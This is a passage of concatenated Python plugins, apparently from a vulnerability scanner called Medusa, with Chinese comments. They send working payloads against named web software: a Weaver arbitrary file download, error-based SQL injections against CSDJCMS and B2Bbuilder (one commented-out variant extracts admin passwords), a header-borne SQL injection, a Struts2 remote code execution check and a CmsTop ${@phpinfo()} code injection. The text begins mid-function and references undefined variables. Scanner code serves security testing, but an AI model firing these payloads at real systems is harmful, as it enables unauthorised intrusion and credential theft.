#写入文件,url为目标文件名统一传入,Medusa为结果 except Exception: _ = VulnerabilityInfo('').info.get('algroup') _l = ClassCongregation.ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名
def medusa(Url, RandomAgent, proxies=None, **kwargs): proxies = ClassCongregation.Proxies().result(proxies) scheme, url, port = UrlProcessing(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: payload_url = scheme + "://" + url + ':' + str(port) + payload headers = { 'Accept-Encoding': 'gzip, deflate', 'Accept': '*/*', 'User-Agent': RandomAgent, } resp = requests.get(payload_url, headers=headers, proxies=proxies, timeout=5, verify=False) con = resp.text code = resp.status_code if code == 200: m = re.search(r'No error in <b>([^<]+)</b>', con) if m: Medusa = "{}存在泛微任意文件下载漏洞 \r\n漏洞详情:\r\nPayload:{}\r\n".format( url, payload_url) _t = VulnerabilityInfo(Medusa) ClassCongregation.VulnerabilityDetails( _t.info, url, **kwargs).Write() # 传入url和扫描到的数据 ClassCongregation.WriteFile().result( str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ClassCongregation.ErrorHandling().Outlier(e, _) _l = ClassCongregation.ErrorLog().Write(url, _) # 调用写入类
def medusa(Url, RandomAgent, ProxyIp): scheme, url, port = ClassCongregation.UrlProcessing().result(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: payload = "/index.php/open/bang" payload_url = scheme + "://" + url + ":" + str(port) + payload headers = { 'User-Agent': RandomAgent, 'Content-Type': 'application/x-www-form-urlencoded', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' } data = "openid=x&denglu=login&username=a%27 and(select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1#&userpass=testvul" s = requests.session() resp = s.post(payload_url, headers=headers, data=data, timeout=6, verify=False) con = resp.text if con.find("for key 'group_key'") != -1: Medusa = "{}存在CSDJCMSSQL注入漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format( url, payload_url, con) _t = VulnerabilityInfo(Medusa) web = ClassCongregation.VulnerabilityDetails(_t.info) web.High() # serious表示严重,High表示高危,Intermediate表示中危,Low表示低危 ClassCongregation.WriteFile().result( str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果 except Exception: _ = VulnerabilityInfo('').info.get('algroup') _l = ClassCongregation.ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名
def medusa(Url,RandomAgent,proxies=None,**kwargs): proxies=ClassCongregation.Proxies().result(proxies) scheme, url, port = UrlProcessing(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port payload_url = scheme+"://"+url+':'+str(port)+'/user.action' host=url+':'+str(port) headers = { 'Host':host, 'Accept-Encoding': 'gzip, deflate', 'Accept': '*/*', 'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2', 'User-Agent': RandomAgent, 'Connection': 'close', 'Content-Type': 'application/x-www-form-urlencoded', 'Content-Length': '571', 'DNT': '1', 'Referer':payload_url, 'Upgrade-Insecure-Requests': '1' } try: resp = requests.post(payload_url, data=payload,headers=headers, proxies=proxies,timeout=5, verify=False) con = resp.text code = resp.status_code if code==200 and con.lower().find('uid')!=-1 and con.lower().find('gid')!=-1 and con.lower().find('groups')!=-1: Medusa = "{} 存在Struts2远程代码执行漏洞\r\n漏洞详情:\r\n影响版本:2_0_0-2_2_3\r\nPayload:{}\r\nPost:{}\r\n".format(url, payload_url,payload) _t = VulnerabilityInfo(Medusa) ClassCongregation.VulnerabilityDetails(_t.info, url,**kwargs).Write() # 传入url和扫描到的数据 ClassCongregation.WriteFile().result(str(url),str(Medusa))#写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ClassCongregation.ErrorHandling().Outlier(e, _) _l = ClassCongregation.ErrorLog().Write("Plugin Name:"+_+" || Target Url:"+url,e)#调用写入类
def medusa(Url,RandomAgent,ProxyIp): scheme, url, port = UrlProcessing(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: # 爆密码: # payload = "/comment.php?ctype=2&conid=16873 and(select 1 from(select count(*),concat((select (select (select concat(0x7e,0x27,unhex(Hex(cast(b2bbuilder_admin.password as char))),0x27,0x7e) from `b2bbuilder`.b2bbuilder_admin Order by user limit 1,1) ) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and 1=1" # 爆账号: payload = "/comment.php?ctype=2&conid=16873%20and(select%201%20from(select%20count(*),concat((select%20(select%20(select%20concat(md5(c),0x3A,password)%20from%20b2bbuilder_admin%20Order%20by%20user%20limit%200,1)%20)%20from%20`information_schema`.tables%20limit%200,1),floor(rand(0)*2))x%20from%20`information_schema`.tables%20group%20by%20x)a)%20and%201=1" payload_url = scheme + "://" + url +":"+ str(port)+ payload headers = { 'User-Agent': RandomAgent, 'Content-Type': 'application/x-www-form-urlencoded', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', } s = requests.session() resp = s.get(payload_url,headers=headers, timeout=6, verify=False) con = resp.text code = resp.status_code if code == 200 and con.find("4a8a08f09d37b73795649038408b5f33") != -1: Medusa = "{}存在B2BbuilderSQL注入漏洞\r\n 验证数据:\r\nUrl:{}\r\n返回内容:{}\r\n".format(url,payload_url,con) _t=VulnerabilityInfo(Medusa) web=ClassCongregation.VulnerabilityDetails(_t.info) web.High() # serious表示严重,High表示高危,Intermediate表示中危,Low表示低危 ClassCongregation.WriteFile().result(str(url),str(Medusa))#写入文件,url为目标文件名统一传入,Medusa为结果 except Exception: _ = VulnerabilityInfo('').info.get('algroup') _l = ClassCongregation.ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名
def medusa(Url, RandomAgent, ProxyIp): scheme, url, port = UrlProcessing(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: payload = "/index.php" payload_url = scheme + "://" + url + ":" + str(port) + payload headers = { 'User-Agent': RandomAgent, 'Content-Type': 'application/x-www-form-urlencoded', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', "X-Forwarded-For": "1.1.1.1',(select 1 from (select count(*),concat((Select concat(md5(3.14))),floor(rand(0)*2))x from information_schema.tables group by x)a),1,1)#" } s = requests.session() resp = s.get(payload_url, headers=headers, timeout=6, verify=False) con = resp.text code = resp.status_code if code == 200 and con.find("4beed3b9c4a886067de0e3a094246f781") != -1: Medusa = "{}存在B2BbuilderSQL注入漏洞\r\n 验证数据:\r\nUrl:{}\r\n返回内容:{}\r\n".format( url, payload_url, resp.text) _t = VulnerabilityInfo(Medusa) web = ClassCongregation.VulnerabilityDetails(_t.info) web.High() # serious表示严重,High表示高危,Intermediate表示中危,Low表示低危 return (str(_t.info)) except Exception: _ = VulnerabilityInfo('').info.get('algroup') _l = ClassCongregation.ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名
def medusa(Url,RandomAgent,ProxyIp): scheme, url, port = ClassCongregation.UrlProcessing().result(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port payload = "/app/?app=search&controller=index&id=$page&action=search&wd=a&test=${@phpinfo()}" payloadurl = scheme + "://" + url + ":" + str(port) + payload payload2 = "/?app=search&controller=index&id=$page&action=search&wd=a&test=${@phpinfo()}" domain_name = ".".join(url.split(".")[1:]) payloadurl2 = scheme + "://app" + domain_name + ":" + str(port) + payload2 Payloads = [payloadurl,payloadurl2] Medusas = [] # 存放返回数据 for payload_url in Payloads: try: headers = { 'User-Agent': RandomAgent, 'Content-Type': 'application/x-www-form-urlencoded', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' } s = requests.session() resp = s.get(payload_url, headers=headers, timeout=6, verify=False) con = resp.text code = resp.status_code if code== 200 and con.find('PHP Version') != -1 and con.find('Configure Command') != -1 : Medusa = "{}存在CmsTop远程代码执行漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format(url,payload_url,con) _t=VulnerabilityInfo(Medusa) web=ClassCongregation.VulnerabilityDetails(_t.info) web.High() # serious表示严重,High表示高危,Intermediate表示中危,Low表示低危 ClassCongregation.WriteFile().result(str(url),str(Medusa))#写入文件,url为目标文件名统一传入,Medusa为结果 except Exception: _ = VulnerabilityInfo('').info.get('algroup') _l = ClassCongregation.ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名